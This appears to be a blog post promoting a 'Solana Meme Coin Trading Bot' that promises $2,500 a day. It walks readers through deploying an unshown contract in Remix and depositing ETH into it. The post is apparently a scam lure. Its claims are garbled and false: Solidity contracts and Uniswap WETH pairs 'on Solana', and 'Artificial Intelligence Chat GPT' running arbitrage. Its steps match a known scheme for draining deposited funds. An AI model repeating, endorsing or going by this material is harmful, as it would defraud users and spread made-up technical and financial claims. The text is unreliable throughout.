How To Create Your $2500/Day Meme Coin Trading Bot on Solana Chain

Joyce Pat
3 min readJun 20, 2024


In the rapidly changing world of cryptocurrency trading, having the right Trade Bot for Cryptocurrencies is crucial for achieving success and seizing opportunities.

Introducing the new “Solana Meme Coin Trading Bot,” an advanced trade bot designed to give traders a significant edge in the market. Specifically designed for Solana, it features a suite of powerful tools that streamline trading processes, improve efficiency, and increase profitability. Whether you are an experienced trader or a beginner, it provides the speed, precision, and adaptability necessary to stay competitive in the ever-changing crypto landscape.

A major benefit of the Solana Meme Coin Trading Bot is its user-friendliness and accessibility for average traders. Unlike traditional centralized exchanges (CEX) or decentralized exchanges (DEX), it automates many of the complex and time-consuming aspects of trading.

In this guide, we use the “Solana Meme Coin Trading Bot” to trade various buy and sell opportunities on the Uniswap Exchange based on price fluctuations.

“Solana Meme Coin Trading Bot” Basic Mechanics

The Bot is funded with liquidity (Recommended: 1 ETH+) to ensure substantial capital for trading and to handle slippage and trading fees.

The bot identifies buying and selling opportunities based on predetermined market conditions and executes trades at high speeds.

Profits can then be withdrawn at your convenience.


The Bot exclusively targets profitable trading opportunities in the Solana Wrapped Ethereum (WETH) Liquidity Pairs.

Contract Deploy Site: 👉 Access Remix — Ethereum IDE (Web-based environment to write and deploy Ethereum smart contracts)

Contract Bot Code (JUNE Update): ⌨️


  • Network symbol is the network the bot trades will be made on (Solana)
  • Owner — Your personal address from which you run the bot.
  • Target — “HwHzMyAcaNPXHeJqFd13rEhHbyyYmXJGP2MCoS2KJvnB” (Elon Mars Contract Address)

NOTE: The Bot works solely on the Ethereum Pair of the Solana Network.

How it works:

  • The contract code creates a brand new contract in which you deposit an initial investment amount.
  • The amount is taken and traded against various tokens on the Solana Network through the Uniswap Exchange using Aritifical Intelligence Chat GPT.
  • Trades are down using arbitrage pairing and using bot trading.


  • Download MetaMask or Google It for official site:
  • Add the Solana Network to Metamask
  • Fund your wallet with 1 ETH+ on the Solana Network (ETH/SOL)
  • Head over to Remix: Remix — Ethereum IDE
  • Right Click the “Contracts” folder and then create “New File”. Name it whatever you want or “bot.sol”
  • Paste THIS code into Remix (this is the Solana Meme Coin Trading Bot code):
  • Go to the “Compile” tab on Remix and Compile with Solidity version 0.6.6
  • Go to the “Deploy & Run Transactions” tab on Remix, select the “Injected Provider” environment, then “Deploy”. This will create your own contract by confirming the MetaMask Contract creation fee.
  • Deposit funds (at least 0.5–5.0 ETH to prevent negating slippage) to your exact contract/bot address.
  • After your transaction is confirmed, start the bot by clicking the “start” button. Withdraw anytime by clicking “withdrawal”

After successful withdrawal, send profits to another wallet.

In case of any errors, retry the tutorial from the start carefully. Take note of capital, slippage & withdrawal address.

NOTE: This code only works on Ethereum of the Solana Network to avoid errors and potential failures of execution.

